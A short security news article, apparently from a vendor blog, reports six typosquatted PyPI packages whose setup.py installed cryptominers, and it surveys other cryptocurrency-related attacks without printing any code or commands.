Malicious packages have recently been detected in PyPI by researchers, a software code repository, that turn developers’ workstations into cryptomining machines.
What Transpired?
Each infected package might be used to launch a supply-chain attack, affecting a variety of projects via info stealers or cryptominers.
- Experts discovered six harmful packages in the PyPI repository: maratlib, maratlib1, matplatlib-plus, mllearnlib, mplatlib, and learninglib.
- The malicious packages were all published by the same individual in an attempt to fool developers into installing them, and it worked.
- Even though there were instances of misspelled names of actual Python projects, there were around 5,000 downloads since April.
- Malicious code was embedded in the setup[.]py file, a build script that would run throughout the installation.
Devil is in the details
Threat actors are constantly attacking open-source code repositories like PyPI, GitHub, and RubyGems in order to mine cryptocurrencies.
- Researchers discovered that actors attempted to download a Bash script (aza2.sh) from a GitHub repository that was no longer available when investigating this issue.
- The script’s purpose was also discovered to be to launch the Ubqminer cryptominer on the hacked PCs.
- In a subsequent attempt, the script included the open-source T-Rex cryptomining application, which makes use of GPU capabilities.
The use of cryptocurrency as a target is very effective.
An onslaught of attacks is currently being launched against bitcoin platforms and their users.
- Threat actors have been seen sending fraudulent replacement devices to Ledger clients in order to steal cryptocurrency from their wallets. In a December data breach, the personal information of 272,853 people who bought a Ledger device was exposed.
- Cryptojacking is one of the most prevalent discussion topics among hackers in cybercriminal forums, according to studies.
- Furthermore, according to a survey, Australians spent almost $2 million in Bitcoin and other cryptocurrencies to cybercriminals last year.
- During the first quarter of 2020, there was a fourfold increase in cryptomining assaults, as the price of Bitcoin skyrocketed.
Cryptojacking operations are a symptom of security vulnerabilities at the business end, whereas malware-laced software repositories are a popular way of carrying out supply-chain attacks. Degraded computer performance, processor burnout, or increased electricity consumption should all be on security teams’ radars. It is extremely encouraged that developers and maintainers of software repositories respond actively.
To read more, please check eScan Blog
